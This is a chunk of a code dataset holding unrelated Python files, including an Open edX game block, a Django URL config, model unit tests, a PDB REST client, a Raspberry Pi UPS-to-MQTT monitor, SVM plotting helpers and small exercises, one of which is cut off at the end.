# default=\"\",\n # scope=Scope.content,\n # help=\"\")\n\n func_url = String(display_name=\"\",\n default=\"\",\n scope=Scope.content,\n help=\"\")\n\n # tour_content = Dict(display_name=\"file classify\",\n # default=dict_key_value,\n # scope=Scope.content,\n # help=\"setting file classify.\")\n\n\n # TO-DO: change this view to display your data your own way.\n def student_view(self, context=None):\n \"\"\"\n The primary view of the GameXBlock, shown to students\n when viewing courses.\n \"\"\"\n Url_Root = os.path.dirname(__file__) \n mako_template = Template(filename=Url_Root+\"/static/html/game_view.html\")\n # if self.image_url:\n # image_url= self.image_url\n # else:\n # image_url = self.runtime.local_resource_url(self, 'public/images/u40.png')\n html_str = mako_template.render_unicode(\n display_name= self.display_name,\n image_url= self.image_url,\n )\n frag = Fragment(html_str)\n css_template = Template(filename=Url_Root+\"/static/css/game.css\")\n frag.add_css(css_template.render_unicode())\n javascript_template = Template(filename=Url_Root+\"/static/js/src/game_view.js\")\n frag.add_javascript(javascript_template.render_unicode())\n frag.initialize_js('GameXBlockView')\n return frag\n\n # TO-DO: change this handler to perform your own actions. You may need more\n # than one handler, or you may not need any handlers at all.\n def studio_view(self, context=None):\n \"\"\"\n The secondary view of the XBlock, shown to teachers\n when editing the XBlock.\n \"\"\"\n Url_Root = os.path.dirname(__file__) \n mako_template = Template(filename=Url_Root+\"/static/html/game_edit.html\") \n html_str = mako_template.render_unicode(\n display_name= self.display_name,\n # tour_content=self.tour_content,\n # func_key = self.func_key,\n )\n frag = Fragment(html_str)\n javascript_template = Template(filename=Url_Root+\"/static/js/src/game_edit.js\")\n frag.add_javascript(javascript_template.render_unicode())\n frag.initialize_js('GameXBlockEdit')\n return frag\n\n @XBlock.json_handler\n def save_game(self, data, suffix=''):\n \"\"\"\n The saving handler.\n \"\"\"\n # dict_image_url = {\n # \"sudoku\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"challenge_memory\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"who_is_a_close_friend\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"tokyo_tower\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"picasso\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"plane_crashed\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"one_yuan_a_few_house\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # \"i_laugh_you_cry\":self.runtime.local_resource_url(self, 'public/images/u15.jpg'),\n # }\n self.display_name= data[\"display_name\"]\n # self.func_key = data[\"content_key\"]\n self.func_url = \"portal/large_screen/teach/game.jsp\"\n self.image_url = self.runtime.local_resource_url(self, 'public/images/game.png')\n return {\n 'result': 'success',\n }\n\n # TO-DO: change this to create the scenarios you'd like to see in the\n # workbench while developing your XBlock.\n @staticmethod\n def workbench_scenarios():\n \"\"\"A canned scenario for display in the workbench.\"\"\"\n return [\n (\"GameXBlock\",\n \"\"\"\n \n \n \n \n \"\"\"),\n ]\n","sub_path":"game/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"320262219","text":"\r\nfrom django.contrib import admin\r\nfrom django.urls import path\r\nfrom mysite import view\r\nfrom . import view\r\nurlpatterns = [\r\n path('admin/', admin.site.urls),\r\n path('', view.index, name='index'),\r\n path('index', view.index, name='index'),\r\n # path('', view.register)\r\n path('register', view.register, name='register'),\r\n path('view', view.view, name='view'),\r\n path('delete/', view.delete),\r\n path('edit/', view.edit),\r\n path('update/', view.update)\r\n]\r\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"114247876","text":"from orm.services.flavor_manager.fms_rest.data.sql_alchemy import db_models\nfrom orm.services.flavor_manager.fms_rest.data.wsme import models\n\nfrom orm.tests.unit.fms import FunctionalTest\n\n\nclass TestWsmeModels(FunctionalTest):\n def test_flavor_wrapper_from_db_model(self):\n\n sql_flavor = db_models.Flavor()\n sql_flavor.description = 'desc'\n sql_flavor.disk = 1\n sql_flavor.ephemeral = 1\n sql_flavor.flavor_extra_specs = [db_models.FlavorExtraSpec('key1', 'val1'),\n db_models.FlavorExtraSpec('key2', 'val2')]\n sql_flavor.flavor_tag = [db_models.FlavorExtraSpec('key1', 'val1'),\n db_models.FlavorExtraSpec('key2', 'val2')]\n sql_flavor.flavor_options = [db_models.FlavorExtraSpec('key1', 'val1'),\n db_models.FlavorExtraSpec('key2', 'val2')]\n sql_flavor.flavor_regions = [db_models.FlavorRegion('region1'),\n db_models.FlavorRegion('region2')]\n sql_flavor.flavor_tenants = [db_models.FlavorTenant('tenant1'),\n db_models.FlavorTenant('tenant2')]\n sql_flavor.id = 'id'\n sql_flavor.internal_id = 1\n sql_flavor.ram = 1\n sql_flavor.visibility = 'visibility'\n sql_flavor.vcpus = 1\n sql_flavor.series = \"p1\"\n sql_flavor.swap = 1\n sql_flavor.disk = 1\n sql_flavor.name = 'name'\n\n wsme_flavors = models.FlavorWrapper.from_db_model(sql_flavor)\n\n self.assertEqual(len(wsme_flavors.flavor.regions), 2)\n self.assertEqual(len(wsme_flavors.flavor.tenants), 2)\n self.assertEqual(wsme_flavors.flavor.extra_specs['key1'], 'val1')\n self.assertEqual(wsme_flavors.flavor.extra_specs['key2'], 'val2')\n\n def test_flavor_wrapper_to_db_model(self):\n flavor_wrapper = models.FlavorWrapper()\n flavor_wrapper.flavor = models.Flavor()\n\n flavor_wrapper.flavor.description = 'desc'\n flavor_wrapper.flavor.disk = '1'\n flavor_wrapper.flavor.ephemeral = '1'\n flavor_wrapper.flavor.extra_specs = {'key1': 'val1', 'key2': 'val2'}\n flavor_wrapper.flavor.tag = {'key1': 'val1', 'key2': 'val2'}\n flavor_wrapper.flavor.options = {'key1': 'val1', 'key2': 'val2'}\n flavor_wrapper.flavor.regions = [models.Region('region1'),\n models.Region('region2')]\n flavor_wrapper.flavor.tenants = ['tenant1', 'tenant2']\n flavor_wrapper.flavor.id = 'id'\n flavor_wrapper.flavor.ram = '1'\n flavor_wrapper.flavor.visibility = 'visibility'\n flavor_wrapper.flavor.vcpus = '1'\n flavor_wrapper.flavor.swap = '1'\n flavor_wrapper.flavor.disk = '1'\n flavor_wrapper.flavor.name = 'name'\n flavor_wrapper.flavor.series = 'p1'\n\n sql_flavor = flavor_wrapper.to_db_model()\n\n self.assertEqual(len(sql_flavor.flavor_regions), 2)\n self.assertEqual(len(sql_flavor.flavor_tenants), 2)\n\n spec = next(s for s in sql_flavor.flavor_extra_specs if s.key_name == 'key1')\n self.assertEqual(spec.key_value, 'val1')\n\n def test_flavor_summary_from_db_model(self):\n sql_flavor = db_models.Flavor()\n sql_flavor.id = 'some id'\n sql_flavor.name = 'some name'\n sql_flavor.description = 'some_decription'\n\n flavor_summary = models.FlavorSummary.from_db_model(sql_flavor)\n\n self.assertEqual(flavor_summary.id, sql_flavor.id)\n self.assertEqual(flavor_summary.name, sql_flavor.name)\n self.assertEqual(flavor_summary.description, sql_flavor.description)\n","sub_path":"orm/tests/unit/fms/test_wsme_models.py","file_name":"test_wsme_models.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"226154462","text":"#!/usr/bin/env python3\n\"\"\"\nUtility for PDB REST API.\nSee: http://www.rcsb.org/pdb/software/rest.do\n\"\"\"\n###\nimport sys,os,re,json,argparse,time,logging\n#\nfrom .. import pdb\n#\nAPI_HOST='www.rcsb.org'\nAPI_BASE_PATH='/pdb/rest'\n#\n##############################################################################\nif __name__=='__main__':\n epilog=\"\"\"\nExample keywords: ACTIN, Example UniProts: P50225'.\nget_uniprots functionality may be discontinued by PDB.\n\"\"\"\n parser = argparse.ArgumentParser(description='PDB REST API client', epilog=epilog)\n ops = ['show_counts',\n 'list_proteins', 'list_ligands',\n 'search',\n 'get_proteins', 'get_ligands', 'get_ligands_LID2SDF',\n 'get_uniprots']\n parser.add_argument(\"op\", choices=ops, help='operation')\n parser.add_argument(\"--ids\", dest=\"ids\", help=\"PDB IDs, comma-separated\")\n parser.add_argument(\"--i\", dest=\"ifile\", help=\"input file, PDB IDs\")\n parser.add_argument(\"--druglike\", action=\"store_true\", help=\"druglike ligands only (organic; !polymer; !monoatomic)\")\n parser.add_argument(\"--o\", dest=\"ofile\", help=\"output file (TSV)\")\n parser.add_argument(\"--qstr\", help=\"search query\")\n parser.add_argument(\"--api_host\", default=API_HOST)\n parser.add_argument(\"--api_base_path\", default=API_BASE_PATH)\n parser.add_argument(\"-v\", \"--verbose\", action=\"count\", default=0)\n\n args = parser.parse_args()\n\n logging.basicConfig(format='%(levelname)s:%(message)s', level=(logging.DEBUG if args.verbose>1 else logging.INFO))\n\n BASE_URL='https://'+args.api_host+args.api_base_path\n\n ids=[]\n if args.ifile:\n fin = open(args.ifile)\n while True:\n line = fin.readline()\n if not line: break\n ids.append(line.strip())\n elif args.ids:\n ids = re.split('[, ]+', args.ids.strip())\n\n if args.ofile:\n fout = open(args.ofile, \"w+\")\n else:\n fout = sys.stdout\n\n t0=time.time()\n\n if args.op == \"get_proteins\":\n if not ids: parser.error('ID[s] required.')\n pdb.Utils.GetProteins(BASE_URL, ids, fout)\n\n elif args.op == \"get_uniprots\":\n if not ids: parser.error('ID[s] required.')\n pdb.Utils.GetUniprots(BASE_URL, ids, fout)\n\n elif args.op == \"get_ligands\":\n if not ids: parser.error('ID[s] required.')\n pdb.Utils.GetLigands(BASE_URL, ids, args.druglike, fout)\n\n elif args.op == \"get_ligands_LID2SDF\":\n if not ids: parser.error('ID[s] required.')\n pdb.Utils.GetLigands_LID2SDF(BASE_URL, ids, fout)\n\n elif args.op == \"list_proteins\":\n pdb.Utils.ListProteins(BASE_URL, fout)\n\n elif args.op == \"list_ligands\":\n pdb.Utils.ListLigands(BASE_URL, args.druglike, fout)\n\n elif args.op == \"show_counts\":\n pdb.Utils.ShowCounts(BASE_URL)\n\n elif args.op == \"search\":\n ids = pdb.Utils.SearchByKeywords(BASE_URL, args.qstr)\n logging.info('protein count: %d'%(len(ids)))\n pdb.Utils.GetProteins(BASE_URL, ids, fout)\n\n else:\n parser.error('Invalid operation: %s'%args.op)\n\n logging.info(('elapsed time: %s'%(time.strftime('%Hh:%Mm:%Ss', time.gmtime(time.time()-t0)))))\n","sub_path":"BioClients/pdb/Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"30220085","text":"\"\"\"\nhttps://www.geeksforgeeks.org/delete-n-nodes-after-m-nodes-of-a-linked-list/\n\"\"\"\nfrom __future__ import print_function\nfrom linklist import SimpleNode as Node\nfrom linklist import printlist\n\n\ndef deleteMN(head, m , n):\n \n curr = head \n \n while curr is not None:\n \n for i in xrange(m-1):\n curr = curr.next\n if curr is None:\n break\n \n if curr is None:\n return\n \n curr_next = curr.next\n \n for i in xrange(n):\n curr_next = curr_next.next\n if curr_next is None:\n break\n if curr_next is None:\n break\n \n curr.next = curr_next\n curr = curr_next\n \n \n \n \nif __name__ == \"__main__\":\n head = None\n for i in xrange(20, -1, -1 ):\n node = Node(i, head)\n head = node\n printlist(head)\n \n deleteMN(head, 3, 2)\n printlist(head)","sub_path":"Chapter 3 linklist/deleteMN.py","file_name":"deleteMN.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"4572596","text":"\"\"\"empty message\n\nRevision ID: 2c8c5c404272\nRevises: 8d35698772c0\nCreate Date: 2018-10-05 23:55:32.477634\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2c8c5c404272'\ndown_revision = '8d35698772c0'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('images',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('image_dir', sa.String(), nullable=True),\n sa.Column('vechile_id', sa.String(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_images_timestamp'), 'images', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_images_timestamp'), table_name='images')\n op.drop_table('images')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2c8c5c404272_.py","file_name":"2c8c5c404272_.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"555921379","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 18 09:54:27 2017\n\n@author: oyeda\n\"\"\"\n\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\ndataframe = pd.read_csv('C:/Users/oyeda/Desktop/AUTOGIS/ass7/Kumpula-June-2016-w-metadata.txt', skiprows= 8)\n\ndataframe.columns\n\nx = dataframe['YEARMODA']\ny = dataframe['TEMP']\n\nplt.plot(x,y)\n\n\n#'r is the colour, o is the circle point, -- is the line connecting the points\nplt.plot(x,y, 'ro--')\nplt.title('Kumpula Temperature in June 2016')\nplt.xlabel('Date')\nplt.ylabel('Temperatue [F]')\nplt.text(20160604, 68, 'High temp in early june')\nplt.axis([20160615, 20160630, 55.0, 70.0])\n\n\nplt.bar(x,y)\nplt.axis([20160615, 20160630, 55.0, 70.0])\n\n\n","sub_path":"ass7/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"260497345","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n# if I don't reverse linked-list,\n# then must use stack\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n\n def reverseLinkedList(node: ListNode) -> ListNode:\n if not node.next:\n return node\n\n newHead = None\n while node:\n extraction = node\n node = node.next\n extraction.next = newHead\n newHead = extraction\n\n return newHead\n\n newl1 = reverseLinkedList(l1)\n newl2 = reverseLinkedList(l2)\n\n carry = 0\n dummy = cur = ListNode(0)\n while newl1 or newl2 or carry:\n if newl1:\n carry += newl1.val\n newl1 = newl1.next\n if newl2:\n carry += newl2.val\n newl2 = newl2.next\n cur.next = ListNode(carry%10)\n cur = cur.next\n carry //= 10\n\n return reverseLinkedList(dummy.next)","sub_path":"solutions/Linked List/problem445_Add Two Numbers II.py","file_name":"problem445_Add Two Numbers II.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"509307517","text":"import sys\nimport Promotions\nimport GC_ADM\n\n\n\"\"\"\nMain function to run the program. Required Inputs:\n :arg Task to Perform\n\"\"\"\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n task_to_do = sys.argv[1]\n if task_to_do == 'Create Promotion Citations':\n Promotions.process()\n elif task_to_do == 'GC and ADM':\n GC_ADM.process()\n else:\n raise Exception('Unknown task: {0}'.format(task_to_do))\n else:\n raise Exception('The minimal input is a task to perform!')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"109612331","text":"from django.shortcuts import render\n\n# Create your views here.\n\nfrom .models import MovieTable\nfrom django.db.models import Avg\nimport requests\nimport lxml.etree\n\n\ndef add(request):\n #从models取数据传递给templates\n user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36'\n headers = {'User-Agent':user_agent}\n url = 'https://movie.douban.com/subject/20495023/comments'\n\n response = requests.get(url=url, headers=headers)\n # print(response.text)\n\n selector = lxml.etree.HTML(response.text)\n\n dict = {'allstar50 rating':5,'allstar40 rating':4,'allstar30 rating':3,\n 'allstar20 rating':2,'allstar10 rating':1}\n\n for i in range(1,21):\n review = selector.xpath(f'//*[@id=\"comments\"]/div[{i}]/div[2]/p/span/text()')\n rating = selector.xpath(f'//*[@id=\"comments\"]/div[{i}]/div[2]/h3/span[2]/span[2]/@class')\n star = dict[rating[0]]\n m = MovieTable()\n m.review = review\n m.star = star\n m.save()\n return render(request,'result.html',locals())\n\ndef display(request):\n querystr = request.GET.get('q')\n conditions = {'star__gt':3}\n if querystr is not None and querystr != '':\n conditions = {'star__gt':3,'review__contains':querystr}\n contents = MovieTable.objects.filter(**conditions)\n return render(request,'index.html',locals())","sub_path":"week06/TSDjango/moviespider/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"569732831","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom svm import SVM\n\n\ndef plot_data(plt: plt, x: np.ndarray, y: np.ndarray, STYLE, label: str = ''):\n '''\n Visualize 2D data items - color according to their class\n :param plt: Plotting library to be used - ex pass plt (import matplotlib.pyplot as plt)\n :param x: 2D data\n :param y: Data labels\n :param STYLE: Marker style and color in list format, ex: [['red', '+'], ['blue', '_']]\n :param label: Obtional plot name\n '''\n unique = np.unique(y)\n for li in range(len(unique)):\n x_sub = x[:, y[0, :] == unique[li]]\n plt.scatter(x_sub[0, :], x_sub[1, :], c=STYLE[li][0], marker=STYLE[li][1], label=label + str(li))\n plt.legend()\n\n\ndef plot_linear_separator(plt: plt, svm: SVM, datamin: int, datamax: int):\n '''\n Visualize linear SVM separator with margins\n :param plt: Plotting library to be used - ex pass plt (import matplotlib.pyplot as plt)\n :param svm: SVM object\n :param datamin: min value on x and y axis to be shown\n :param datamax: max value on x and y axis to be shown\n '''\n x = np.arange(datamin, datamax + 1.0)\n MARG = -(svm.w[0] * x + svm.bias) / svm.w[1]\n YUP = (1 - svm.w[0] * x - svm.bias) / svm.w[1] # Margin\n YLOW = (-1 - svm.w[0] * x - svm.bias) / svm.w[1] # Margin\n plt.plot(x, MARG, 'k-')\n plt.plot(x, YUP, 'k--')\n plt.plot(x, YLOW, 'k--')\n for sv in svm.sv:\n plt.plot(sv[0], sv[1], 'kx')\n\n\ndef plot_kernel_separator(plt: plt, svm: SVM, datamin: float, datamax: float, h: float = 0.05, alpha: float = 0.25):\n '''\n :param plt: Plotting library to be used - ex pass plt (import matplotlib.pyplot as plt)\n :param svm: SVM object\n :param datamin: min value on x and y axis to be shown\n :param datamax: max value on x and y axis to be shown\n :param h: Density of classified background points\n :return:\n '''\n # function visualizes decision boundaries using color plots\n # creating meshgrid for different values of features\n xx, yy = np.meshgrid(np.arange(datamin, datamax, h), np.arange(datamin, datamax, h))\n # extracting predictions at different points in the mesh\n some = np.transpose(np.c_[xx.ravel(), yy.ravel()])\n Z = svm.classifyKernel(some)\n Z = Z.reshape(xx.shape)\n # plotting the mesh\n plt.pcolormesh(xx, yy, Z, cmap=plt.cm.Paired, alpha=alpha, shading='auto')\n for sv in svm.sv:\n plt.plot(sv[0], sv[1], 'kx')\n plt.grid()\n\n\ndef get_rbg_image(image: np.ndarray) -> np.ndarray:\n img = np.zeros((32, 32, 3))\n img[:, :, 0] = np.reshape(image[:1024], (32, 32))\n img[:, :, 1] = np.reshape(image[1024:2048], (32, 32))\n img[:, :, 2] = np.reshape(image[2048:], (32, 32))\n\n return img\n\n\ndef figurePlotting(imgarray: np.ndarray, N: int, is_cifar: bool, name: str = '', random: bool = True) -> None:\n '''\n CIFAR / MNIST image visualization - rescaling the vector images to 32x32 and visualizes in a matplotlib plot\n :param imgarray: Array of images to be visualized, each column is an image\n :param N: Number of images per row/column\n :param name: Optional name of the plot\n :param random: True if the images should be taken randomly from the array - otherwise start of the array is taken\n '''\n plt.figure(name)\n for i in range(0, N * N):\n imgIndex = i\n if random:\n imgIndex = np.random.randint(low=0, high=imgarray.shape[1])\n if is_cifar:\n img = get_rbg_image(imgarray[:, imgIndex])\n plt.subplot(N, N, i + 1)\n plt.imshow(img)\n plt.axis('off')\n else:\n img = np.reshape(imgarray[:, imgIndex], (16, 16))\n plt.subplot(N, N, i + 1)\n plt.imshow(img, cmap='gray')\n plt.axis('off')\n\n\ndef visualizeClassification(data: np.ndarray, labels: np.ndarray, predictions: np.ndarray, num: int, is_cifar: bool,\n name='') -> None:\n '''\n Use SVM classifier to classify images and plot a window with correctly classified and one with wrongly classified images\n :param data: CIFAR data each column is an image\n :param labels: Data labels (-1.0 or 1.0)\n :param predictions: Predicted data labels (-1.0 or 1.0)\n :param num: Number of CIFAR images to show\n :param name: Optional name of the plot\n '''\n res = np.abs(predictions - labels) / 2.0\n number_of_misses = int(np.sum(res))\n number_of_hits = int(data.shape[1] - number_of_misses)\n index = (res == 1.0).reshape(-1).astype(bool)\n\n missed_vectors = data[:, index]\n n_pictures = int(math.ceil(math.sqrt(min(num, number_of_misses))))\n\n if n_pictures > 0:\n figurePlotting(missed_vectors, n_pictures, is_cifar, name + \": Misclassified\")\n\n index = np.invert(index)\n hit_vectors = data[:, index]\n n_pictures = int(math.ceil(math.sqrt(min(num, number_of_hits))))\n\n if n_pictures > 0:\n figurePlotting(hit_vectors, n_pictures, is_cifar, name + \": Correct\")\n plt.show()\n","sub_path":"code/plotting_helper.py","file_name":"plotting_helper.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"199801301","text":"import sys\n\nimport numpy as np\nimport pytest\n\nfrom opytimizer.core import function\nfrom opytimizer.optimizers import abc\nfrom opytimizer.spaces import search\n\n\ndef test_abc_hyperparams():\n hyperparams = {\n 'n_trials': 5\n }\n\n new_abc = abc.ABC(hyperparams=hyperparams)\n\n assert new_abc.n_trials == 5\n\n\ndef test_abc_hyperparams_setter():\n new_abc = abc.ABC()\n\n new_abc.n_trials = 10\n assert new_abc.n_trials == 10\n\n\ndef test_abc_build():\n new_abc = abc.ABC()\n\n assert new_abc.built == True\n\n\ndef test_abc_run():\n def square(x):\n return np.sum(x**2)\n\n new_function = function.Function(pointer=square)\n\n hyperparams = {\n 'n_trials': 10\n }\n\n new_abc = abc.ABC(hyperparams=hyperparams)\n\n search_space = search.SearchSpace(n_agents=2, n_iterations=100,\n n_variables=2, lower_bound=[0, 0],\n upper_bound=[10, 10])\n\n history = new_abc.run(search_space, new_function)\n\n assert len(history.agents) > 0\n assert len(history.best_agent) > 0\n","sub_path":"tests/opytimizer/optimizers/test_abc.py","file_name":"test_abc.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"395473692","text":"# -*-coding:utf-8-*-\n# @Time : 2019/6/19 0019 16:27\n# @Author :zhuxinquan\n# @File : echarts_02.py\n\n\n# from pyecharts import Map, Geo\nfrom pyecharts.charts import Geo, Map\n# 世界地图数据\nvalue = [95.1, 23.2, 43.3, 66.4, 88.5]\nattr = [\"China\", \"Canada\", \"Brazil\", \"Russia\", \"United States\"]\n\n# 省和直辖市\nprovince_distribution = {\n '河南': 45.23,\n '北京': 37.56,\n '河北': 21,\n '辽宁': 12,\n '江西': 6,\n '上海': 20,\n '安徽': 10,\n '江苏': 16,\n '湖南': 9,\n '浙江': 13,\n '海南': 2,\n '广东': 22,\n '湖北': 8,\n '黑龙江': 11,\n '澳门': 1,\n '陕西': 11,\n '四川': 7,\n '内蒙古': 3,\n '重庆': 3,\n '云南': 6,\n '贵州': 2,\n '吉林': 3,\n '山西': 12,\n '山东': 11,\n '福建': 4,\n '青海': 1,\n '舵主科技,质量保证': 1,\n '天津': 1,\n '其他': 1}\nprovice = list(province_distribution.keys())\nvalues = list(province_distribution.values())\n\n# 城市 -- 指定省的城市 xx市\ncity = ['郑州市', '安阳市', '洛阳市', '濮阳市', '南阳市', '开封市', '商丘市', '信阳市', '新乡市']\nvalues2 = [1.07, 3.85, 6.38, 8.21, 2.53, 4.37, 9.38, 4.29, 6.1]\n\n# 区县 -- 具体城市内的区县 xx县\nquxian = ['夏邑县', '民权县', '梁园区', '睢阳区', '柘城县', '宁陵县']\nvalues3 = [3, 5, 7, 8, 2, 4]\n\n\n# maptype='china' 只显示全国直辖市和省级\n# 数据只能是省名和直辖市的名称\nmap = Map(\"中国地图\", '中国地图', width=1200, height=600)\nmap.add(\n \"\",\n provice,\n values,\n visual_range=[\n 0,\n 50],\n maptype='china',\n is_visualmap=True,\n visual_text_color='#000')\nmap.show_config()\nmap.render(path=\"04-01中国地图.html\")\n","sub_path":"Python/Test_matplotlib/mat_map_echarts/echarts_02.py","file_name":"echarts_02.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"370186088","text":"#!/usr/bin/python\nimport smbus\nimport time\nimport os, sys\nimport paho.mqtt.client as mqtt\nimport json\nimport logging\nimport RPi.GPIO as GPIO\n\nlogging.basicConfig(level=logging.INFO)\n\nclient =mqtt.Client(\"ups\")\nMQTT_BROKER_ADDR = 'localhost'\nTOPIC = \"/feeds/ups\"\n\nbus = smbus.SMBus(1) # 1 = /dev/i2c-1 (port I2C1)\nADDRESS = 0x6a #I2C address of the ups\n#Refer to http://www.ti.com/lit/ds/symlink/bq25895.pdf for register maps\n\n### Initialization ###############################################\nREG_WATCHDOG = 0x07\nBYTE_WATCHDOG_STOP = 0b10001101 #Stop Watchdog timer\nREG_ILIM = 0x00 #ILIM register\nBYTE_ILIM = 0b01101000 #2A input current limit\nREG_ICHG = 0x04 \nBYTE_ICHG = 0b00001000 #.5A charging current limit\nREG_CONV_ADC = 0x02\nREG_BATFET = 0x09\nBYTE_BATFET = 0b01001000 #delay before battery is disconnected\n\ntry:\n bus.write_byte_data(ADDRESS, REG_WATCHDOG, BYTE_WATCHDOG_STOP)\n bus.write_byte_data(ADDRESS, REG_ILIM, BYTE_ILIM)\n bus.write_byte_data(ADDRESS, REG_ICHG, BYTE_ICHG)\n bus.write_byte_data(ADDRESS, REG_BATFET, BYTE_BATFET)\n logging.info(\"UPS initialized\")\nexcept:\n logging.error(\"Initialization failed, check connection to the UPS!\")\n sys.exit(1) \n###################################################################\n\n\nBAT_CAPACITY = 2900 #Battery capacity in mah\nCURRENT_DRAW = 2000 #Current draw in mah\nREG_CONV_ADC = 0x02\nBYTE_CONV_ADC_START = 0b10011101\nBYTE_CONV_ADC_STOP = 0b00011101\nREG_BATFET_DIS = 0x09\nBYTE_BATFET_DIS = 0b01101000\nREG_STATUS = 0x0B #address of status register\nREG_BATV = 0x0e\nREG_FAULT = 0x0c\n\nSLEEPDELAY = 10\n\ndisconnectflag = False\nshutdowncmd = 'sudo shutdown -H '\ncancelshutdowncmd = 'sudo shutdown -c'\nbatpercentprev = 0\n\ndef int_to_bool_list(num):\n return [bool(num & (1<1 :\n batpercent = 1\n \n timeleftmin = int( batpercent * 60* BAT_CAPACITY / CURRENT_DRAW)\n if timeleftmin < 0 :\n timeleftmin = 0\n \n if power == \"Connected\" :\n timeleftmin = -1 \n \n if power == \"Not Connected\" and disconnectflag == False :\n disconnectflag = True\n message = \"echo Power Disconnected, system will shutdown in %d minutes! | wall\" % (timeleftmin)\n os.system(message)\n \n if power == \"Connected\" and disconnectflag == True :\n disconnectflag = False\n message = \"echo Power Restored, battery at %d percent | wall\" % (batpercentprev * 100)\n os.system(message)\n \n batpercentprev = batpercent\n\n data = { \n 'PowerInput': power,\n 'ChargeStatus' : charge,\n 'BatteryVoltage' : '%.2f'%batv,\n \"BatteryPercentage\" : int(batpercent*100),\n 'TimeRemaining' : int(timeleftmin)\n }\n \n data_out = json.dumps(data)\n logging.debug(data)\n\n try:\n client.publish(TOPIC,data_out)\n except:\n logging.error(\"Error publishing ups status\")\n\n if(batv < 3.5):\n client.disconnect()\n bus.write_byte_data(ADDRESS, REG_BATFET_DIS, BYTE_BATFET_DIS)\n os.system('sudo shutdown -H now')\n\ndef interrupt_handler(channel):\n read_status() \n\ntry:\n client.connect(MQTT_BROKER_ADDR)\n logging.info(\"Connected to MQTT broker\")\nexcept:\n logging.error(\"Error connecting to MQTT broker\") \n\nread_status()\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(4, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.add_event_detect(4, GPIO.FALLING, callback=interrupt_handler, bouncetime=200)\n\nwhile (True):\n time.sleep(SLEEPDELAY)\n read_status()\n \n","sub_path":"src/upsmqtt.py","file_name":"upsmqtt.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"352704228","text":"class Time:\r\n def __init__(self, h, m, s):\r\n self.hour = h\r\n self.min = m\r\n self.sec = s\r\n \r\n def show(self):\r\n print(f\"Result is: {self.hour}:{self.min}:{self.sec}\")\r\n \r\n def SUM(self, time2):\r\n result = Time(None, None, None)\r\n result.hour = self.hour + time2.hour\r\n result.min = self.min + time2.min\r\n result.sec = self.sec + time2.sec\r\n\r\n if result.sec >= 60:\r\n result.min += result.sec // 60\r\n result.sec = result.sec % 60\r\n \r\n if result.min >= 60:\r\n result.hour += result.min // 60\r\n result.min = result.min % 60\r\n \r\n return result\r\n\r\n def Submission(self, time2):\r\n result = Time(None, None, None)\r\n result.hour = self.hour - time2.hour\r\n result.min = self.min - time2.min\r\n result.sec 